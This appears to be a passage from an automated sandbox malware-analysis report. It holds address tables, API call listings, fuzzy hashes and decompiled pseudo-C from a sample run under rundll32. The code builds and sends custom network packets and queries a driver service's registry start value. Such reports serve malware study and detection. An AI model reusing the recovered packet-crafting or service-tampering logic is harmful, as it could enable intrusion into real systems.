                                                                                                          0x04a42bfe
                                                                                                          0x04a42c01
                                                                                                          0x04a42c09
                                                                                                          0x04a42c14
                                                                                                          0x04a42c1f
                                                                                                          0x04a42c23
                                                                                                          0x04a42c2b
                                                                                                          0x04a42c32
                                                                                                          0x04a42c35
                                                                                                          0x04a42c39
                                                                                                          0x04a42c3c
                                                                                                          0x04a42c40
                                                                                                          0x04a42c41
                                                                                                          0x04a42c4e
                                                                                                          0x04a42c54
                                                                                                          0x04a42c65
                                                                                                          0x04a42c67
                                                                                                          0x04a42c6c
                                                                                                          0x04a42dc3
                                                                                                          0x04a42dcd
                                                                                                          0x04a42dd3
                                                                                                          0x00000000
                                                                                                          0x04a42dd3
                                                                                                          0x04a42c79
                                                                                                          0x04a42c89
                                                                                                          0x04a42c90
                                                                                                          0x04a42c9a
                                                                                                          0x04a42ca0
                                                                                                          0x04a42ca8
                                                                                                          0x04a42cb3
                                                                                                          0x04a42cb4
                                                                                                          0x04a42cb7
                                                                                                          0x04a42cc1
                                                                                                          0x04a42cca
                                                                                                          0x04a42ccc
                                                                                                          0x04a42cd0
                                                                                                          0x04a42cd7
                                                                                                          0x04a42cda
                                                                                                          0x04a42cdd
                                                                                                          0x04a42ce1
                                                                                                          0x04a42ce4
                                                                                                          0x04a42ce8
                                                                                                          0x04a42cee
                                                                                                          0x04a42cf1
                                                                                                          0x04a42cf6
                                                                                                          0x04a42cf9
                                                                                                          0x04a42d00
                                                                                                          0x04a42d04
                                                                                                          0x04a42d04
                                                                                                          0x04a42d08
                                                                                                          0x04a42d08
                                                                                                          0x04a42d0b
                                                                                                          0x04a42d0c
                                                                                                          0x04a42d0c
                                                                                                          0x04a42d0f
                                                                                                          0x04a42d17
                                                                                                          0x04a42d1c
                                                                                                          0x04a42d1f
                                                                                                          0x04a42d22
                                                                                                          0x04a42d22
                                                                                                          0x04a42d25
                                                                                                          0x04a42d2b
                                                                                                          0x04a42d2c
                                                                                                          0x04a42d31
                                                                                                          0x04a42d34
                                                                                                          0x04a42d3b
                                                                                                          0x04a42dae
                                                                                                          0x04a42dba
                                                                                                          0x04a42dc0
                                                                                                          0x00000000
                                                                                                          0x04a42dc0
                                                                                                          0x04a42d40
                                                                                                          0x04a42d41
                                                                                                          0x04a42d4b
                                                                                                          0x04a42d4c
                                                                                                          0x04a42d53
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a42d55
                                                                                                          0x04a42d5b
                                                                                                          0x04a42d5c
                                                                                                          0x04a42d64
                                                                                                          0x04a42d65
                                                                                                          0x04a42d83
                                                                                                          0x04a42d86
                                                                                                          0x04a42d8a
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a42d6a
                                                                                                          0x04a42d6d
                                                                                                          0x04a42d74
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a42d7d
                                                                                                          0x04a42d9b
                                                                                                          0x04a42da6
                                                                                                          0x04a42daa
                                                                                                          0x04a42daa
                                                                                                          0x00000000
                                                                                                          0x04a42d9b
                                                                                                          0x04a42d7f
                                                                                                          0x04a42d81
                                                                                                          0x04a42d82
                                                                                                          0x04a42d82
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,74714F20,?,04A44775), ref: 04A429BF
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,04A44775), ref: 04A429C8
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00001124,?,04A44775), ref: 04A429DC
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,04A44775), ref: 04A429DF
                                                                                                          • rand.MSVCRT ref: 04A429F0
                                                                                                          • htons.WS2_32(00000050), ref: 04A42A25
                                                                                                          • rand.MSVCRT ref: 04A42A7E
                                                                                                          • rand.MSVCRT ref: 04A42A96
                                                                                                          • send.WS2_32(00000000,00000000,00000054,00000000), ref: 04A42ABB
                                                                                                          • recv.WS2_32(00000000,?,0000FFFF,00000000), ref: 04A42AD2
                                                                                                          • rand.MSVCRT ref: 04A42AE7
                                                                                                          • htons.WS2_32(00001120), ref: 04A42B06
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000160,?,04A44775), ref: 04A42B6A
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,04A44775), ref: 04A42B71
                                                                                                          • htons.WS2_32(0000015C), ref: 04A42B90
                                                                                                          • rand.MSVCRT ref: 04A42BBE
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000048,?,04A44775), ref: 04A42BD2
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,04A44775), ref: 04A42BD9
                                                                                                          • htons.WS2_32(00000044), ref: 04A42BF8
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00001638,?,04A44775), ref: 04A42C58
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,04A44775), ref: 04A42C5F
                                                                                                          • memcpy.MSVCRT ref: 04A42C79
                                                                                                          • memcpy.MSVCRT ref: 04A42C90
                                                                                                          • htons.WS2_32(00000050), ref: 04A42C9A
                                                                                                          • memcpy.MSVCRT ref: 04A42D17
                                                                                                          • send.WS2_32(00000004,00000004,0000111C,0000000B), ref: 04A42D37
                                                                                                          • send.WS2_32(00000004,-00001118,0000051C,0000000B), ref: 04A42D4F
                                                                                                          • recv.WS2_32(00000004,?,0000FFFF,0000000B), ref: 04A42D86
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000004,?,?,?,?,?,?,?,?,?,?,04A44775), ref: 04A42DB3
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,04A44775), ref: 04A42DBA
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,04A44775), ref: 04A42DC6
                                                                                                          • HeapFree.KERNEL32(00000000,?,04A44775), ref: 04A42DCD
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,04A44775), ref: 04A42DD9
                                                                                                          • HeapFree.KERNEL32(00000000,?,04A44775), ref: 04A42DE0
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,?,04A44775), ref: 04A42DE9
                                                                                                          • HeapFree.KERNEL32(00000000,?,04A44775), ref: 04A42DF0
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,04A44775), ref: 04A42DFB
                                                                                                          • HeapFree.KERNEL32(00000000,?,04A44775), ref: 04A42E02
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$AllocFreehtonsrand$memcpysend$recv
                                                                                                          • String ID: Oqt Uqt0Xqt
                                                                                                          • API String ID: 2063504749-636472023
                                                                                                          • Opcode ID: 2c8e7bec2d3300aaa840969a9dabe716b305537f4d83ddedeec336443f285a7e
                                                                                                          • Instruction ID: 0a3c8299e174bd12d1bad72ea24f6c3734b579b0c0f5ddb58ed15e1409e03128
                                                                                                          • Opcode Fuzzy Hash: 2c8e7bec2d3300aaa840969a9dabe716b305537f4d83ddedeec336443f285a7e
                                                                                                          • Instruction Fuzzy Hash: 45E1BD7A600305EFEB109FA4C985BAE7BB4FFC8710F104499FA049B291E7B6E841CB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 77%
                                                                                                          			E04A43D0D(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr* _a8, short _a12, intOrPtr _a16, void* _a20, void** _a24, long _a28, void* _a32) {
                                                                                                          				char _v5;
                                                                                                          				void* _v12;
                                                                                                          				void* _t139;
                                                                                                          				short _t158;
                                                                                                          				void* _t169;
                                                                                                          				signed int _t173;
                                                                                                          				int _t176;
                                                                                                          				void* _t184;
                                                                                                          				signed short _t186;
                                                                                                          				intOrPtr _t207;
                                                                                                          				void* _t212;
                                                                                                          				short _t219;
                                                                                                          				void* _t223;
                                                                                                          				intOrPtr* _t225;
                                                                                                          				short _t227;
                                                                                                          				short _t228;
                                                                                                          				signed int _t229;
                                                                                                          				intOrPtr* _t234;
                                                                                                          				intOrPtr _t243;
                                                                                                          				void* _t255;
                                                                                                          				void* _t261;
                                                                                                          
                                                                                                          				_t243 = __edx;
                                                                                                          				_push(__ecx);
                                                                                                          				_push(__ecx);
                                                                                                          				 *_a24 =  *_a24 & 0x00000000;
                                                                                                          				_v5 = 0;
                                                                                                          				_t139 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                          				_v12 = _t139;
                                                                                                          				if(_t139 == 0) {
                                                                                                          					L24:
                                                                                                          					return _v5;
                                                                                                          				}
                                                                                                          				_t261 = HeapAlloc(GetProcessHeap(), 8, 0x27);
                                                                                                          				if(_t261 == 0) {
                                                                                                          					L23:
                                                                                                          					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                          					goto L24;
                                                                                                          				}
                                                                                                          				 *_t261 = 0x12;
                                                                                                          				 *((intOrPtr*)(_t261 + 0x1c)) = 0x48;
                                                                                                          				_t223 = HeapAlloc(GetProcessHeap(), 8, 0x3d);
                                                                                                          				if(_t223 == 0) {
                                                                                                          					L22:
                                                                                                          					HeapFree(GetProcessHeap(), 8, _t261);
                                                                                                          					goto L23;
                                                                                                          				}
                                                                                                          				_t225 =  *_a32;
                                                                                                          				if(1 !=  *_t225) {
                                                                                                          					 *(_t261 + 8) = 0x3c;
                                                                                                          					asm("cdq");
                                                                                                          					asm("adc edx, [ecx+0x4c]");
                                                                                                          					 *((intOrPtr*)(_t223 + 1)) = ( *(_t225 + 0x51) & 0x000000ff) +  *((intOrPtr*)(_t225 + 0x48));
                                                                                                          					 *((intOrPtr*)(_t223 + 5)) = _t243;
                                                                                                          					 *((intOrPtr*)(_t223 + 9)) =  *((intOrPtr*)(_t225 + 0x48)) + 0x200;
                                                                                                          					 *((intOrPtr*)(_t223 + 0x11)) = _a16;
                                                                                                          					 *((intOrPtr*)(_t223 + 0x15)) = _a20;
                                                                                                          					_t158 = _a28;
                                                                                                          					asm("adc edx, 0x0");
                                                                                                          					 *((intOrPtr*)(_t223 + 0xd)) =  *((intOrPtr*)(_t225 + 0x4c));
                                                                                                          					 *((char*)(_t223 + 0x21)) = 8;
                                                                                                          					 *((char*)(_t223 + 0x25)) = 8;
                                                                                                          					 *((char*)(_t223 + 0x29)) = 8;
                                                                                                          					 *((short*)(_t223 + 0x2d)) = _t158;
                                                                                                          					 *((short*)(_t223 + 0x31)) = _t158;
                                                                                                          					 *((short*)(_t223 + 0x35)) = _t158;
                                                                                                          					 *((char*)(_t223 + 0x3b)) = 5;
                                                                                                          				} else {
                                                                                                          					 *(_t261 + 8) = 0x30;
                                                                                                          					asm("cdq");
                                                                                                          					asm("adc edx, [ecx+0x4c]");
                                                                                                          					 *((intOrPtr*)(_t223 + 1)) = ( *(_t225 + 0x51) & 0x000000ff) +  *((intOrPtr*)(_t225 + 0x48));
                                                                                                          					 *((intOrPtr*)(_t223 + 5)) = _t243;
                                                                                                          					 *((intOrPtr*)(_t223 + 5)) =  *((intOrPtr*)(_t225 + 0x48)) + 0x200;
                                                                                                          					 *((intOrPtr*)(_t223 + 9)) = _a16;
                                                                                                          					_t219 = _a28;
                                                                                                          					 *((char*)(_t223 + 0x15)) = 8;
                                                                                                          					 *((char*)(_t223 + 0x19)) = 8;
                                                                                                          					 *((char*)(_t223 + 0x1d)) = 8;
                                                                                                          					 *((short*)(_t223 + 0x21)) = _t219;
                                                                                                          					 *((short*)(_t223 + 0x25)) = _t219;
                                                                                                          					 *((short*)(_t223 + 0x29)) = _t219;
                                                                                                          					 *((char*)(_t223 + 0x2f)) = 5;
                                                                                                          				}
                                                                                                          				 *(_t261 + 0x18) =  *(_t261 + 8);
                                                                                                          				 *(_t261 + 0x20) =  *(_t225 + 0x53) & 0x000000ff;
                                                                                                          				 *(_t261 + 0x25) = ( *(_t261 + 0x18) & 0x0000ffff) + 1;
                                                                                                          				if(E04A43209(_t225, _a4,  *_a8,  *(_t225 + 0x30) & 0x0000ffff, _t261, _t223, ( *(_t261 + 0x18) & 0x0000ffff) + 1) == 0) {
                                                                                                          					L21:
                                                                                                          					HeapFree(GetProcessHeap(), 8, _t223);
                                                                                                          					goto L22;
                                                                                                          				} else {
                                                                                                          					Sleep(0x7d0);
                                                                                                          					_t169 = HeapAlloc(GetProcessHeap(), 8, 0x29);
                                                                                                          					_a20 = _t169;
                                                                                                          					if(_t169 == 0) {
                                                                                                          						goto L21;
                                                                                                          					}
                                                                                                          					 *((intOrPtr*)(_t169 + 8)) = 0x42e0;
                                                                                                          					 *((intOrPtr*)(_t169 + 0x10)) = 0x42e0;
                                                                                                          					 *_t169 = 0x13;
                                                                                                          					 *(_t169 + 0x14) = 4;
                                                                                                          					 *((intOrPtr*)(_t169 + 0x18)) = 0x4c;
                                                                                                          					_t227 = 5;
                                                                                                          					 *((short*)(_t169 + 0x25)) = _t227;
                                                                                                          					 *((intOrPtr*)(_t169 + 4)) = 0x1000;
                                                                                                          					 *((intOrPtr*)(_t169 + 0xc)) = 0x1000;
                                                                                                          					_t228 = 7;
                                                                                                          					 *((short*)(_t169 + 0x27)) = _t228;
                                                                                                          					asm("stosd");
                                                                                                          					asm("stosw");
                                                                                                          					asm("stosb");
                                                                                                          					 *((short*)(_t223 + 3)) = _a12;
                                                                                                          					_t173 = rand();
                                                                                                          					_t229 = 0x28;
                                                                                                          					asm("cdq");
                                                                                                          					 *( *_a8 + 0x22) =  *( *_a8 + 0x22) + _t173 % _t229;
                                                                                                          					_t253 = _a8;
                                                                                                          					_t231 =  *( *_a8 + 0x22) & 0x0000ffff;
                                                                                                          					_t176 = E04A432AF(_a4,  *_a8,  *( *_a8 + 0x22) & 0x0000ffff, _a20, _t223,  *(_a20 + 0x27) & 0x0000ffff);
                                                                                                          					if(_t176 == 0) {
                                                                                                          						memset(_t261, _t176, 0x27);
                                                                                                          						 *_t261 = 0x12;
                                                                                                          						_t184 = E04A43209(_t231, _a4,  *_t253,  *( *_a32 + 0x32) & 0x0000ffff, _t261, _t223,  *(_t261 + 0x25) & 0x0000ffff);
                                                                                                          						if(_t184 != 0) {
                                                                                                          							_t255 = _v12;
                                                                                                          							__imp__#16(_a4, _t255, 0xffff, 0);
                                                                                                          							if(_t184 > 0 &&  *((intOrPtr*)(_t255 + 9)) == 0) {
                                                                                                          								_a28 = _a28 & 0x0000ffff;
                                                                                                          								_t186 =  *(_t255 + 2) & 0x0000ffff;
                                                                                                          								__imp__#9(_t186);
                                                                                                          								if(_a28 + 8 <= (_t186 & 0x0000ffff)) {
                                                                                                          									_t234 =  *_a32;
                                                                                                          									asm("cdq");
                                                                                                          									asm("sbb eax, edx");
                                                                                                          									 *((intOrPtr*)(_t234 + 0x48)) =  *((intOrPtr*)(_t255 + 0x4c)) - ( *(_t234 + 0x51) & 0x000000ff);
                                                                                                          									 *((intOrPtr*)(_t234 + 0x4c)) =  *((intOrPtr*)(_v12 + 0x50));
                                                                                                          									if(1 !=  *_t234) {
                                                                                                          										 *(_t261 + 4) = 8;
                                                                                                          									} else {
                                                                                                          										 *(_t261 + 4) = 4;
                                                                                                          									}
                                                                                                          									 *(_t261 + 0xc) =  *(_t261 + 4);
                                                                                                          									 *((intOrPtr*)(_t261 + 0x10)) = 0x48;
                                                                                                          									 *(_t261 + 0x14) =  *(_t234 + 0x54) & 0x000000ff;
                                                                                                          									 *(_t261 + 0x25) =  *(_t261 + 4) + 1;
                                                                                                          									 *((intOrPtr*)(_t223 + 1)) =  *((intOrPtr*)(_t234 + 0x48));
                                                                                                          									 *((intOrPtr*)(_t223 + 5)) =  *((intOrPtr*)(_t234 + 0x4c));
                                                                                                          									if(E04A43209(_t234, _a4,  *_a8,  *(_t234 + 0x30) & 0x0000ffff, _t261, _t223,  *(_t261 + 0x25) & 0x0000ffff) != 0) {
                                                                                                          										Sleep(0x7d0);
                                                                                                          										_push(2);
                                                                                                          										asm("stosw");
                                                                                                          										asm("stosb");
                                                                                                          										 *(_t261 + 8) = 0;
                                                                                                          										 *(_t261 + 0x18) = 0;
                                                                                                          										_t207 =  *_a32;
                                                                                                          										 *(_t261 + 4) = 0;
                                                                                                          										 *(_t261 + 0xc) = 0;
                                                                                                          										 *((intOrPtr*)(_t261 + 0x10)) = 0;
                                                                                                          										 *(_t261 + 0x14) = 0;
                                                                                                          										 *((intOrPtr*)(_t261 + 0x1c)) = 0x48;
                                                                                                          										 *(_t261 + 0x20) =  *(_t207 + 0x59) & 0x000000ff;
                                                                                                          										 *(_t261 + 0x25) =  *(_t261 + 8) + 1;
                                                                                                          										 *((short*)(_t223 + 1)) =  *((intOrPtr*)(_t207 + 0x32));
                                                                                                          										if(E04A43209( *(_t261 + 0x25) & 0x0000ffff, _a4,  *_a8,  *(_t207 + 0x30) & 0x0000ffff, _t261, _t223,  *(_t261 + 0x25) & 0x0000ffff) != 0) {
                                                                                                          											Sleep(0x7d0);
                                                                                                          											_t212 = HeapAlloc(GetProcessHeap(), 8, _a28);
                                                                                                          											 *_a24 = _t212;
                                                                                                          											if(_t212 != 0) {
                                                                                                          												memcpy(_t212, _v12 + 0x54, _a28);
                                                                                                          												_v5 = 1;
                                                                                                          											}
                                                                                                          										}
                                                                                                          									}
                                                                                                          								}
                                                                                                          							}
                                                                                                          						}
                                                                                                          					}
                                                                                                          					HeapFree(GetProcessHeap(), 8, _a20);
                                                                                                          					goto L21;
                                                                                                          				}
                                                                                                          			}
























                                                                                                          0x04a43d0d
                                                                                                          0x04a43d10
                                                                                                          0x04a43d11
                                                                                                          0x04a43d15
                                                                                                          0x04a43d27
                                                                                                          0x04a43d34
                                                                                                          0x04a43d36
                                                                                                          0x04a43d3b
                                                                                                          0x04a440da
                                                                                                          0x04a440e0
                                                                                                          0x04a440e0
                                                                                                          0x04a43d4b
                                                                                                          0x04a43d4f
                                                                                                          0x04a440cb
                                                                                                          0x04a440d3
                                                                                                          0x00000000
                                                                                                          0x04a440d9
                                                                                                          0x04a43d59
                                                                                                          0x04a43d5c
                                                                                                          0x04a43d68
                                                                                                          0x04a43d6c
                                                                                                          0x04a440bf
                                                                                                          0x04a440c5
                                                                                                          0x00000000
                                                                                                          0x04a440c5
                                                                                                          0x04a43d75
                                                                                                          0x04a43d7d
                                                                                                          0x04a43dca
                                                                                                          0x04a43dd5
                                                                                                          0x04a43dd9
                                                                                                          0x04a43ddc
                                                                                                          0x04a43ddf
                                                                                                          0x04a43ded
                                                                                                          0x04a43df3
                                                                                                          0x04a43df9
                                                                                                          0x04a43dfc
                                                                                                          0x04a43e00
                                                                                                          0x04a43e03
                                                                                                          0x04a43e06
                                                                                                          0x04a43e0a
                                                                                                          0x04a43e0e
                                                                                                          0x04a43e12
                                                                                                          0x04a43e16
                                                                                                          0x04a43e1a
                                                                                                          0x04a43e1e
                                                                                                          0x04a43d7f
                                                                                                          0x04a43d7f
                                                                                                          0x04a43d8a
                                                                                                          0x04a43d8e
                                                                                                          0x04a43d91
                                                                                                          0x04a43d94
                                                                                                          0x04a43d9f
                                                                                                          0x04a43da5
                                                                                                          0x04a43da8
                                                                                                          0x04a43dac
                                                                                                          0x04a43db0
                                                                                                          0x04a43db4
                                                                                                          0x04a43db8
                                                                                                          0x04a43dbc
                                                                                                          0x04a43dc0
                                                                                                          0x04a43dc4
                                                                                                          0x04a43dc4
                                                                                                          0x04a43e25
                                                                                                          0x04a43e2c
                                                                                                          0x04a43e35
                                                                                                          0x04a43e50
                                                                                                          0x04a440b3
                                                                                                          0x04a440b9
                                                                                                          0x00000000
                                                                                                          0x04a43e56
                                                                                                          0x04a43e5b
                                                                                                          0x04a43e68
                                                                                                          0x04a43e6e
                                                                                                          0x04a43e73
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a43e7e
                                                                                                          0x04a43e81
                                                                                                          0x04a43e86
                                                                                                          0x04a43e89
                                                                                                          0x04a43e90
                                                                                                          0x04a43e97
                                                                                                          0x04a43e98
                                                                                                          0x04a43ea1
                                                                                                          0x04a43ea4
                                                                                                          0x04a43ea9
                                                                                                          0x04a43eaa
                                                                                                          0x04a43eb2
                                                                                                          0x04a43eb3
                                                                                                          0x04a43eb5
                                                                                                          0x04a43eba
                                                                                                          0x04a43ec3
                                                                                                          0x04a43ecb
                                                                                                          0x04a43ecc
                                                                                                          0x04a43ed2
                                                                                                          0x04a43eda
                                                                                                          0x04a43ee2
                                                                                                          0x04a43eeb
                                                                                                          0x04a43ef2
                                                                                                          0x04a43efc
                                                                                                          0x04a43f0f
                                                                                                          0x04a43f1d
                                                                                                          0x04a43f24
                                                                                                          0x04a43f2a
                                                                                                          0x04a43f38
                                                                                                          0x04a43f40
                                                                                                          0x04a43f54
                                                                                                          0x04a43f57
                                                                                                          0x04a43f5c
                                                                                                          0x04a43f6d
                                                                                                          0x04a43f76
                                                                                                          0x04a43f7f
                                                                                                          0x04a43f88
                                                                                                          0x04a43f8a
                                                                                                          0x04a43f8d
                                                                                                          0x04a43f96
                                                                                                          0x04a43fa1
                                                                                                          0x04a43f98
                                                                                                          0x04a43f98
                                                                                                          0x04a43f98
                                                                                                          0x04a43fab
                                                                                                          0x04a43fae
                                                                                                          0x04a43fb9
                                                                                                          0x04a43fc2
                                                                                                          0x04a43fc9
                                                                                                          0x04a43fcf
                                                                                                          0x04a43fed
                                                                                                          0x04a43ff8
                                                                                                          0x04a44000
                                                                                                          0x04a44004
                                                                                                          0x04a44006
                                                                                                          0x04a44008
                                                                                                          0x04a4400b
                                                                                                          0x04a44011
                                                                                                          0x04a44015
                                                                                                          0x04a44018
                                                                                                          0x04a4401b
                                                                                                          0x04a4401e
                                                                                                          0x04a44021
                                                                                                          0x04a4402c
                                                                                                          0x04a44035
                                                                                                          0x04a4403d
                                                                                                          0x04a4405c
                                                                                                          0x04a44063
                                                                                                          0x04a44075
                                                                                                          0x04a4407e
                                                                                                          0x04a44082
                                                                                                          0x04a4408f
                                                                                                          0x04a44097
                                                                                                          0x04a44097
                                                                                                          0x04a44082
                                                                                                          0x04a4405c
                                                                                                          0x04a43fed
                                                                                                          0x04a43f6d
                                                                                                          0x04a43f40
                                                                                                          0x04a43f24
                                                                                                          0x04a440a7
                                                                                                          0x00000000
                                                                                                          0x04a440ad

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,74714F20,?,?,?,04A44269,?,00000000,?,?,?,00000000,00000100,?), ref: 04A43D2B
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,04A44269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04A43D34
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000027,00000000,?,?,?,04A44269,?,00000000,?,?,?,00000000,00000100,?,?), ref: 04A43D46
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,04A44269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04A43D49
                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000003D,?,?,?,04A44269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04A43D63
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,04A44269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04A43D66
                                                                                                          • Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,04A44269,?,00000000,?,?,?), ref: 04A43E5B
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000029,?,?,?,04A44269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04A43E65
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,04A44269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04A43E68
                                                                                                          • rand.MSVCRT ref: 04A43EC3
                                                                                                          • memset.MSVCRT ref: 04A43EFC
                                                                                                            • Part of subcall function 04A43209: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,04A43BAA,?,?,?,00000000,00000000,?,?,?,04A44A6E), ref: 04A43220
                                                                                                            • Part of subcall function 04A43209: HeapAlloc.KERNEL32(00000000,?,04A43BAA,?,?,?,00000000,00000000,?,?,?,04A44A6E,?,?,?,?), ref: 04A43227
                                                                                                            • Part of subcall function 04A43209: htons.WS2_32(?), ref: 04A43246
                                                                                                            • Part of subcall function 04A43209: memcpy.MSVCRT ref: 04A43276
                                                                                                            • Part of subcall function 04A43209: send.WS2_32(?,00000000,?,00000000), ref: 04A43287
                                                                                                            • Part of subcall function 04A43209: GetProcessHeap.KERNEL32(00000008,00000000), ref: 04A4329A
                                                                                                            • Part of subcall function 04A43209: HeapFree.KERNEL32(00000000), ref: 04A432A1
                                                                                                          • recv.WS2_32(00000000,00000000,0000FFFF,00000000), ref: 04A43F38
                                                                                                          • htons.WS2_32(?), ref: 04A43F5C
                                                                                                          • Sleep.KERNEL32(000007D0,00000000,00000000,?,00000000,00000000,?), ref: 04A43FF8
                                                                                                          • Sleep.KERNEL32(000007D0,00000000,00000000,?,00000000,00000000,?), ref: 04A44063
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 04A4406E
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A44075
                                                                                                          • memcpy.MSVCRT ref: 04A4408F
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,?,?,00000000,?,?,?,?,04A44269,?,00000000,?,?), ref: 04A440A0
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,04A44269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04A440A7
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,04A44269,?,00000000,?,?), ref: 04A440B6
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,04A44269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04A440B9
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04A44269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04A440C2
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,04A44269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04A440C5
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04A44269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04A440D0
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,04A44269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04A440D3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$Alloc$Free$Sleep$htonsmemcpy$memsetrandrecvsend
                                                                                                          • String ID: Oqt Uqt0Xqt
                                                                                                          • API String ID: 2208892845-636472023
                                                                                                          • Opcode ID: 930bf24fec4aab3b57448067ae213d538ad4ecdde774037d5b73a1d1cabef1be
                                                                                                          • Instruction ID: b97e909b67c6bd666d9e0e029047f6c932bdcdda89391b2a50319ae8d4bfcd69
                                                                                                          • Opcode Fuzzy Hash: 930bf24fec4aab3b57448067ae213d538ad4ecdde774037d5b73a1d1cabef1be
                                                                                                          • Instruction Fuzzy Hash: 99D14BB4100340AFEB10DF69C884B6ABBE5FF8C304F148559F989DB292E779E855CB64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A413E8() {
                                                                                                          				void* _v8;
                                                                                                          				char _v12;
                                                                                                          				int _v16;
                                                                                                          				char _v20;
                                                                                                          				int _v24;
                                                                                                          				short _v544;
                                                                                                          				long _t45;
                                                                                                          				signed int _t47;
                                                                                                          				short* _t49;
                                                                                                          				int _t54;
                                                                                                          
                                                                                                          				_v16 = 0;
                                                                                                          				wsprintfW( &_v544, L"SYSTEM\\CurrentControlSet\\services\\%ws", L"cdfs");
                                                                                                          				if(RegOpenKeyExW(0x80000002,  &_v544, 0, 0xf003f,  &_v8) == 0) {
                                                                                                          					_t54 = 4;
                                                                                                          					_t49 = L"Start";
                                                                                                          					_v12 = 0;
                                                                                                          					_v24 = _t54;
                                                                                                          					if(RegQueryValueExW(_v8, _t49, 0, 0,  &_v12,  &_v24) == 0 && _v12 == _t54) {
                                                                                                          						_v12 = 0;
